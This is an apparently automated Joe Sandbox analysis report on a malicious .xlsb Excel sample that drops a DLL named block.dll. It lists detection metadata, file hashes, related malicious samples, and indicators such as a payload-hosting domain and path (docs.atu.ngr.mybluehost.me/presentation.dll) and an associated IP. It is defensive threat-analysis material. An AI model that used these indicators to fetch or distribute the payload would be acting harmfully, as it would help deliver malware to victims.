Start time: 19:47:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 2s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 6613n246zm543w.xlsb
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winXLSB@12/59@4/2
EGA Information: Failed
HDC Information:
• Successful, ratio: 4.1% (good quality ratio 3.9%)
• Quality average: 80.3%
• Quality standard deviation: 27.6%
HCA Information: Failed
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xlsb
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
                                                                                                                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 104.43.193.48, 23.57.81.29, 204.79.197.200, 13.107.21.200, 20.82.209.183, 40.88.32.150, 23.218.209.135, 52.109.76.68, 52.109.76.34, 52.109.8.22, 104.42.151.234, 92.122.213.249, 92.122.213.194, 2.20.142.209, 2.20.142.210, 88.221.62.148, 52.155.217.156, 20.54.26.129, 152.199.19.161
                                                                                                                                                                        • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus16.cloudapp.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net
                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/403127/sample/6613n246zm543w.xlsb

                                                                                                                                                                        Simulations

                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                        No simulations

                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                        IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
162.241.24.47 | 4Y2I7k0.xlsb | Get hash | malicious | Browse | docs.atu.ngr.mybluehost.me/presentation.dll

                                                                                                                                                                        Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
docs.atu.ngr.mybluehost.me | 4Y2I7k0.xlsb | Get hash | malicious | Browse | 162.241.24.47

                                                                                                                                                                        ASN

Match: UNIFIEDLAYER-AS-1US
Associated Sample Name / URL | SHA 256 | Detection | Link | Context
DEMARG MALAYHCU21345.exe | Get hash | malicious | Browse | 162.241.169.22
generated check 662732.xlsm | Get hash | malicious | Browse | 192.185.177.61
4Y2I7k0.xlsb | Get hash | malicious | Browse | 162.241.24.47
QUOTATION REQUEST.exe | Get hash | malicious | Browse | 192.185.131.134
gunzipped.exe | Get hash | malicious | Browse | 192.254.189.182
Purchase Order #DH0124 REF#SCAN005452 EXW HMM SO#UKL080947 - FD210268-001.xlsx.exe | Get hash | malicious | Browse | 162.144.13.239
0145d964_by_Libranalysis.exe | Get hash | malicious | Browse | 162.241.169.22
HXxk3mzZeW.exe | Get hash | malicious | Browse | 192.185.140.111
HCU213DES.doc | Get hash | malicious | Browse | 162.241.169.22
RFQ.exe | Get hash | malicious | Browse | 192.254.236.251
a3aa510e_by_Libranalysis.exe | Get hash | malicious | Browse | 192.185.221.204
Outstanding Payment Plan.xls | Get hash | malicious | Browse | 192.185.129.69
FULL SOA $16848.exe | Get hash | malicious | Browse | 192.185.113.120
BL Draft - HL-88312627.exe | Get hash | malicious | Browse | 192.254.180.165
ARIX SRLVl (MN) - Italy.exe | Get hash | malicious | Browse | 192.254.185.244
DocNo2300058329.doc__.rtf | Get hash | malicious | Browse | 74.220.199.6
NINGBO_STATEMENT OF ACCOUNT.exe | Get hash | malicious | Browse | 192.185.226.148
signed contract invoice.exe | Get hash | malicious | Browse | 192.254.236.251
DUBAI UAE HCU4321890.exe | Get hash | malicious | Browse | 162.241.169.22
Payment Copy 0002.exe | Get hash | malicious | Browse | 50.87.153.37

                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                        No context

                                                                                                                                                                        Dropped Files

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
C:\Users\Public\block.dll | 4Y2I7k0.xlsb | Get hash | malicious | Browse |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll | 4Y2I7k0.xlsb | Get hash | malicious | Browse |

                                                                                                                                                                            Created / dropped Files

                                                                                                                                                                            C:\Users\Public\block.dll
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):312832
                                                                                                                                                                            Entropy (8bit):6.133421258123313
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6144:92dsJtFrYUZZqrS6HtYP612U8ZIbBmWMOzWb/0:9SsJtFrYJS6NYy123IMWLz5
                                                                                                                                                                            MD5:5A7C87DAB250CEE78CE63AC34117012B
                                                                                                                                                                            SHA1:554C4CCF2341182768D475087D8A8BCFAA525A12
                                                                                                                                                                            SHA-256:8A26C32848C9EA085505359F67927D1A744EC07303ED0013E592ECA6B4DF4790
                                                                                                                                                                            SHA-512:3B4BD7963E3C397618562708064674BD2418F5CAB71CE861986EFA3BCD14FA6B0155DAECE10B9A7AD3FE0F7FAC6FDFD693B4AC2451F4EAABB30BA8253286B7ED
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: 4Y2I7k0.xlsb, Detection: malicious, Browse
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................................................................Rich...........PE..L....Hn`...........!.................;.......................................P............@.........................`...T.......<.... .......................0..........................................@............................................text............................... ..`.data...Hq..........................@....rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0D9072B0-AC38-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):29272
                                                                                                                                                                            Entropy (8bit):1.7646610956151878
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:rwZrZa24WSt9if17rlzMJkdVk6JWZBk2pB:rwZrZa24WSt9if17rlzMed66EZBk2pB
                                                                                                                                                                            MD5:F4D7D4225A39DC05E7537055270E85E4
                                                                                                                                                                            SHA1:061334EBAD7D6ACB9CD53936DB7F076F1C0ED065
                                                                                                                                                                            SHA-256:79C546B8A03645805CB89EB6E9E9384F21E93A4FD7A734549C073DE2BAEC4DD9
                                                                                                                                                                            SHA-512:636F7D6D72372D38AB83886B47C672DDCE96DB0D5C6318515C9D671EC12ED2441FB2518BE8092CE430A8BE9D405D86F735A3604519CAB144E8AAADCD49D10A30
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Reputation:low
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E4D8D27E-AC37-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):29272
                                                                                                                                                                            Entropy (8bit):1.7737072676409908
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:rOhZFZi2OWGtXuifD01LzMo2jT26/0XB5UpB:ruZFZi2OWGteifQ1LzM3ja6sXB5UpB
                                                                                                                                                                            MD5:A2A6839BDA52A359EE932476EB3034F5
                                                                                                                                                                            SHA1:1C25EA0713E15FCF8B4C32A68E6719FFA90C18C8
                                                                                                                                                                            SHA-256:4F81E35546B3DD8872D9C2FD4CB4DAF52D24B41560D3652CD75DD4C7B9804222
                                                                                                                                                                            SHA-512:2D444EEC7F2F60842AAF8E979AD1F73828B6CE5BEA56F06312BC3A68A1EC8161094863E1E5D46CDA8D8EDA7951CC5B30F208D4C752DAB4BEE70F79C1BDC782F8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{FF57CED6-AC37-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):29272
                                                                                                                                                                            Entropy (8bit):1.7624766566850816
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:rzZsZB2kyWkpNtkpJifkpBztzMkpHlW6QhBkeupB:r1Mwkxkp3kpmkpwkp4kP
                                                                                                                                                                            MD5:3C9DBF863282EA3930AC0B86A38E6C4F
                                                                                                                                                                            SHA1:89D97F236492B0126805CE33ECD87EB812209130
                                                                                                                                                                            SHA-256:1DF483DE3B5074599337CF0AF30A9A2D71DCF7FFF969731FA150450A1887B38B
                                                                                                                                                                            SHA-512:86F2073A0D38C789FA3E7726D910F1C1A018AFDDF3071BC9686AC10FE79164D87B5B309F6C1AEAC54E3B2C63CD97339414A347FFF73AD25FF40CEDB0BC1960E7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{0D9072B2-AC38-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):28160
                                                                                                                                                                            Entropy (8bit):1.922841220511737
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:rqoZkpQz6RkMjR2NWQM4pnN/DhfxOVexfN/DhNA:rTzWC+AklAphw4he
                                                                                                                                                                            MD5:B9842DF84F24B4F6FD4FF37192C11BD3
                                                                                                                                                                            SHA1:CCCDD2DB9D5F979159C6A523A40A65BC659911AC
                                                                                                                                                                            SHA-256:E9BE1AA3D7438B043EE470DF16DDB162663263DA5A8F248B97DBACCCC38CDB1C
                                                                                                                                                                            SHA-512:9820138DBC20946BFB7C6D8781D8867B3D68DDB031909AF6DF0E57EFF3A366C6EA8044B032C8E5C099DAB212FB7384671E2E23D3B40800D4E8A1E686803E68C3
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E4D8D280-AC37-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):27728
                                                                                                                                                                            Entropy (8bit):1.9388286851838568
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:rAZzQhd6Bkxjx2eWvMw5sWjB1Xu1sWjB1XOA:rw8CyNgVkYpzX2pzXp
                                                                                                                                                                            MD5:633ABE828B8481D6C34ED27BABC296D1
                                                                                                                                                                            SHA1:5EA212D8657D344F1DEA9F30B28FCC9E6DC6B796
                                                                                                                                                                            SHA-256:D58FB7E2DBC87EDD9568EC19F17BA0DE663F014AB93625F5F075924CDDFA3F2E
                                                                                                                                                                            SHA-512:C8E04FC92D9EDEC1B493269DCF6165AE62F31297B27CD84BEA9C310C36434D44C30B062751CACCDE5293D4A03169FF8E938CE8ACAA273DC64ADA7D094405964F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{FF57CED8-AC37-11EB-90EB-ECF4BBEA1588}.dat
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:Microsoft Word Document
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):28136
                                                                                                                                                                            Entropy (8bit):1.9179455348957073
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:rFZrQH6tk8jN2RWKMayU0NFNqhl0NUNFNq+A:rLEaWuEALRU0mFm
                                                                                                                                                                            MD5:7F1981374D28941BDA99E4B415A9C2C2
                                                                                                                                                                            SHA1:C83C83BAC2B4F3EDF2BC87446316EC2C693187C3
                                                                                                                                                                            SHA-256:84C8B65207178301C83F894168FF012B85AF08EE0A8ADCC74EAFB49D866AA3B0
                                                                                                                                                                            SHA-512:3F561DA85CE27611766291375810D5B2218752197EF416D06C47813CAA4F583AC01CBFB70BA07299B19A38D1EDBB3EAC739201D62DF05105D76B754709EB1A67
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):656
                                                                                                                                                                            Entropy (8bit):5.122038663787781
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxOE5A5AbnWimI002EtM3MHdNMNxOE5AsUZnWimI00OYGVbkEtMb:2d6NxOq6mSZHKd6NxOqwSZ7YLb
                                                                                                                                                                            MD5:5C472CC58D7580C71522808204D7AA75
                                                                                                                                                                            SHA1:D726FFAD4848943BDA7FCAC7FC8D6CC33F62332B
                                                                                                                                                                            SHA-256:D6D5492514CDD06CF032B7E675E6323CCE6A24647F1637AF39934E4D813A2299
                                                                                                                                                                            SHA-512:1D9E9EDDC1612DE92D17FC13CF8F4422A7E6C0112547A2768F0EC443EE1C3710FB3BDEDB6659657E8AAD3F83988270B3B63BD392D8907A808B08B4522593A591
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):653
                                                                                                                                                                            Entropy (8bit):5.119497405990879
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxe2kJwJwbnWimI002EtM3MHdNMNxe2kJwJwbnWimI00OYGkak6EtMb:2d6NxrqKWSZHKd6NxrqKWSZ7Yza7b
                                                                                                                                                                            MD5:BD5A9A07CBFBA3C26F4861C01EB5CECD
                                                                                                                                                                            SHA1:4244E4677BB2185AC5EFDD34738598033CA39599
                                                                                                                                                                            SHA-256:DA84C4F4657DF753818487CDA6415EFC76CE75808F577D135A0126CC5BA14FEF
                                                                                                                                                                            SHA-512:5C9BF8CE62A8D48C4FCCC5A1922F5DAD60E104D415D76EA11F4E1EEA9A6AE7BB59D10595DE75600E85F6FB3DA8001B2550CCC5A81C1DF1D93ADD570F9C7AFA56
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xbb1f2f2f,0x01d74044</date><accdate>0xbb1f2f2f,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0xbb1f2f2f,0x01d74044</date><accdate>0xbb1f2f2f,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):662
                                                                                                                                                                            Entropy (8bit):5.127257186913745
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxvLsUCUZnWimI002EtM3MHdNMNxvLsUCUZnWimI00OYGmZEtMb:2d6NxvPSZHKd6NxvPSZ7Yjb
                                                                                                                                                                            MD5:8BE9456692048E2904892A4A3A398402
                                                                                                                                                                            SHA1:31173BEA7AE5AEDC650DD64DD3BCEE5C1EF6E556
                                                                                                                                                                            SHA-256:061150D63F4F443E67D2F4E0B447AFAA9F251955CA1566C2498A185DD474537C
                                                                                                                                                                            SHA-512:E97351BC09C7575DD77C5DF3A435AA0EA8A829F93200565119573F2E9BFC086D764D606EF27B0BEF722A11A083458043DAE7A49CB7AE0844B79FC801322DC957
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):647
                                                                                                                                                                            Entropy (8bit):5.14773887520185
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:TMHdNMNxipEpEbnWimI002EtM3MHdNMNxipEpEbnWimI00OYGd5EtMb:2d6NxWQCSZHKd6NxWQCSZ7YEjb
                                                                                                                                                                            MD5:9D34745A3931E1C93AA1B00E99989C36
                                                                                                                                                                            SHA1:84D97466C1DD799BEA87831A70E54DC3F1FCDFDF
                                                                                                                                                                            SHA-256:AB08F9F00E9E3A8B9E5C4036631E814680F2C12DD4D2238B2E6B66CA6CB01AF5
                                                                                                                                                                            SHA-512:9DB746D074F67473DCFE29C156C1297016592A45C909157BDA99D6B7CBCFA217942B2AF04187ECB1E758804C7156A03D92774B79BB3A7BF2D3EA9FFD82124DF6
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xbb265666,0x01d74044</date><accdate>0xbb265666,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0xbb265666,0x01d74044</date><accdate>0xbb265666,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):656
Entropy (8bit):5.1378498359506235
Encrypted:false
SSDEEP:12:TMHdNMNxhGwsUCUZnWimI002EtM3MHdNMNxhGwsUCUZnWimI00OYG8K075EtMb:2d6NxQaSZHKd6NxQaSZ7YrKajb
MD5:40F8C4EBCA3FC2A4B507051438F549B7
SHA1:72DC1055269DE2E8D6A04BC11558712DA953D200
SHA-256:4C016C5D7F404728A8C141BE7D36E70571BCE6B42875C2D2D34769674AE5E8DC
SHA-512:BBCAE449361A239CAB1256E00D724DDE968749ACDB621FFF644B5EDF2DB5616FF53776614A3D9F3704686AFB46648D9D1954DD685F02069707B035A6A89A4D08
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xbb2d7d58,0x01d74044</date><accdate>0xbb2d7d58,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):653
Entropy (8bit):5.1239176019668475
Encrypted:false
SSDEEP:12:TMHdNMNx0n5A5AbnWimI002EtM3MHdNMNx0n5A5AbnWimI00OYGxEtMb:2d6Nx056mSZHKd6Nx056mSZ7Ygb
MD5:31B0EC24F336AA5243C544D25BF8765D
SHA1:9F36941F9E755FAB69A0CA18D1DD9CA850257D81
SHA-256:C203319D1BCF6727D6ED02F5EFC8320E6EA019A95EFFF4F0691A5F4881B0E50A
SHA-512:CACA04D59864E9012A3CBB42CFAEBEE8C7CB6077D623DB6EB73EEBE0FE4E64170BF00AD075A7AB2F573432BB31BE392858E3761037F85102F66FDEEE66D0BBA7
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0xbb28b8a6,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):656
Entropy (8bit):5.175254502787159
Encrypted:false
SSDEEP:12:TMHdNMNxxpEpEbnWimI002EtM3MHdNMNxxpE5AbnWimI00OYG6Kq5EtMb:2d6NxfQCSZHKd6Nxf2mSZ7Yhb
MD5:12DA374ACDECCFE8A013040E1F7B6738
SHA1:AC28F2E667C79DF7D5CAE5C399FC572944A605F7
SHA-256:5C742BE846E97C16EBDB23180BA5C4249567838C45FEE160BB79FD1F4B9EBF7D
SHA-512:C23DA6F0E35CBC3F2C8688CC6D5BB1A38FA852A6DEEA78446C08F7DC048EF95C78D477D208E07897DF2A5B5805C6AF27FD5D351645CC10F03F684B81EF650481
Malicious:false
Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xbb265666,0x01d74044</date><accdate>0xbb265666,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0xbb265666,0x01d74044</date><accdate>0xbb28b8a6,0x01d74044</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml
Process:C:\Program Files\internet explorer\iexplore.exe
File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):659
Entropy (8bit):5.133384812047998
Encrypted:false
SSDEEP:12:TMHdNMNxcI+I+bnWimI002EtM3MHdNMNxcI+I+bnWimI00OYGVEtMb:2d6NxnVASZHKd6NxnVASZ7Ykb
MD5:2F81131A4E5445898771BB1F1A18C9E9
SHA1:AD2E6BAF73817D527131352523A5F2E6B89BB2B5
SHA-256:11C183D066173DB314F92A8A7325E3A46BF018BEEA1A3032A1EB94347DF7933E
SHA-512:59D49FCFBE81D099518EB02BADE7E89F9B4739198EC728C36AC9B62DE9785ADDC9F3D47535518EDFF8C22324FFB0EC54110A2F3557E572F21B17C3BADC708913
Malicious:false
